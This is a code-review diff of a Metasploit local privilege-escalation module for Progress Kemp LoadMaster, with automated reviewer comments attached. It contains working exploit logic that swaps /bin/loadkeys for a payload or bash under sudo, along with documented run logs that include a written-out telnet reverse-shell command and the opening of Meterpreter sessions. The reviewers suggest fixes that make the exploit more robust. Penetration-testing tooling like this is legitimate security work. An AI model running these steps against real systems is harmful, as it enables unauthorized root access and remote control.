diff --git a/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md b/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md
index c9d02c26b82b..798e8a0e9148 100644
--- a/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md
+++ b/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md
@@ -73,13 +73,13 @@ msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Found 3 indicators this is a KEMP product
 [!] The service is running, but could not be validated.
-[*] Execute dropper
-[*] Moving /bin/loadkeys to /tmp/.xcglzfitgpg
-[*] Moving /tmp/.feooibtpp to /bin/loadkeys
+[*] Writing payload to /tmp/.rypuliojtdch
+[*] Moving /bin/loadkeys to /tmp/.qyiojnfbnfc
+[*] Moving /tmp/.rypuliojtdch to /bin/loadkeys
 [*] Running /bin/loadkeys
-[+] Deleted /tmp/.feooibtpp
-[*] Meterpreter session 8 opened (10.5.135.201:4444 -> 10.5.134.141:28858) at 2024-05-03 12:05:12 -0500
-[*] Moving /tmp/.xcglzfitgpg to /bin/loadkeys
+[+] Deleted /tmp/.rypuliojtdch
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.141:28850) at 2024-05-10 08:50:39 -0500
+[*] Moving /tmp/.qyiojnfbnfc to /bin/loadkeys
 [+] /bin/loadkeys returned to original contents
 
 meterpreter > sysinfo
@@ -108,7 +108,7 @@ Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024): WRITABLE_DIR /tmp yes A directory where we can write files -Payload options (cmd/unix/reverse_awk): +Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- 
@@ -128,17 +128,27 @@ View the full module info with the info, or info -d command. msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run -[*] Started reverse TCP handler on 10.5.135.201:4444 +[+] sh -c '(sleep 4376|telnet 10.5.135.201 4444|while : ; do sh && break; done 2>&1|telnet 10.5.135.201 4444 >/dev/null 2>&1 &)' +[*] Started reverse TCP double handler on 10.5.135.201:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Found 3 indicators this is a KEMP product [!] The service is running, but could not be validated. -[*] Execute command -[*] Moving /bin/loadkeys to /tmp/.twqrvjasafa +[*] Preparing payload command +[*] Moving /bin/loadkeys to /tmp/.mnqdvfwutfd [*] Moving /bin/bash to /bin/loadkeys [*] Running payload command -[*] Command shell session 7 opened (10.5.135.201:4444 -> 10.5.134.141:16589) at 2024-05-03 12:02:00 -0500 +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo igZFhKRnh9GplIdu; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nigZFhKRnh9GplIdu\r\n" [*] -[*] Moving /tmp/.twqrvjasafa to /bin/loadkeys +[*] Moving /tmp/.mnqdvfwutfd to /bin/loadkeys +[*] Matching... +[*] B is input... [+] /bin/loadkeys returned to original contents ls
diff --git a/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb b/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
index ed2a76d3168c..de18ca4d2df0 100644
--- a/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
@@ -108,7 +108,7 @@ def verify_copy(src, dest, elevate)
 end
 
 def execute_dropper(target_binary, binary_rename, temp_payload_path)
- vprint_status('Execute dropper')
+ vprint_status("Writing payload to #{temp_payload_path}")
 write_file(temp_payload_path, generate_payload_exe)
 chmod(temp_payload_path)
 register_file_for_cleanup(temp_payload_path)
@@ -120,7 +120,7 @@ def execute_dropper(target_binary, binary_rename, temp_payload_path)
 end
 
 def execute_command(target_binary, binary_rename, cmd)
- vprint_status('Execute command')
+ vprint_status('Preparing payload command')
 # save copy of target_binary
 return unless verify_copy(target_binary, binary_rename, false)
 return unless verify_copy('/bin/bash', target_binary, true)
@@ -134,6 +134,7 @@ def exploit
 if writable_dir.blank? || (writable_dir[-1] != '/')
 writable_dir += '/'
 end
+ fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)
 target_binary = datastore['TARGET_BINARY']
 binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
 target_binary_hash = file_remote_digestmd5(target_binary)
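Review bot: The result of `write_file(temp_payload_path, generate_payload_exe)` on the line after the new status message is never checked, so a failed write is followed by `chmod` and cleanup registration for a file that may not exist, and presumably by the move of the target binary further down. If write_file reports failure in this codebase, stop there instead: `fail_with(Failure::Unknown, "Failed to write payload to #{temp_payload_path}") unless write_file(temp_payload_path, generate_payload_exe)`. That also makes the method consistent with execute_command, which already bails on each failed verify_copy. execute_dropper continues past the end of the hunk.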
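Review bot: If the second `verify_copy('/bin/bash', target_binary, true)` fails, the method returns after the first verify_copy has already moved target_binary to binary_rename, so the target is left without its original binary on that path unless the restore step shown at the end of the documented run also covers this early return (the caller is outside the hunk, so I cannot confirm). If it does not, restore before returning, e.g. `unless verify_copy('/bin/bash', target_binary, true)` followed by `verify_copy(binary_rename, target_binary, true)` and `return`. execute_command continues outside the hunk.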
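Review bot: The new `fail_with` guard does not reject a blank WRITABLE_DIR, because the `if writable_dir.blank? || ...` branch just above it turns an empty value into `'/'`, and `directory?('/')` passes; binary_rename would then be placed directly under the filesystem root. Check the blank case before the slash is appended, e.g. `fail_with(Failure::BadConfig, 'WRITABLE_DIR must be set') if writable_dir.blank?`. Since the option is described as a directory where files can be written, the check would also match its contract better as `directory?(writable_dir) && writable?(writable_dir)`; `directory?` alone accepts a read-only path and the failure only surfaces later as a write error. exploit continues past the end of the hunk.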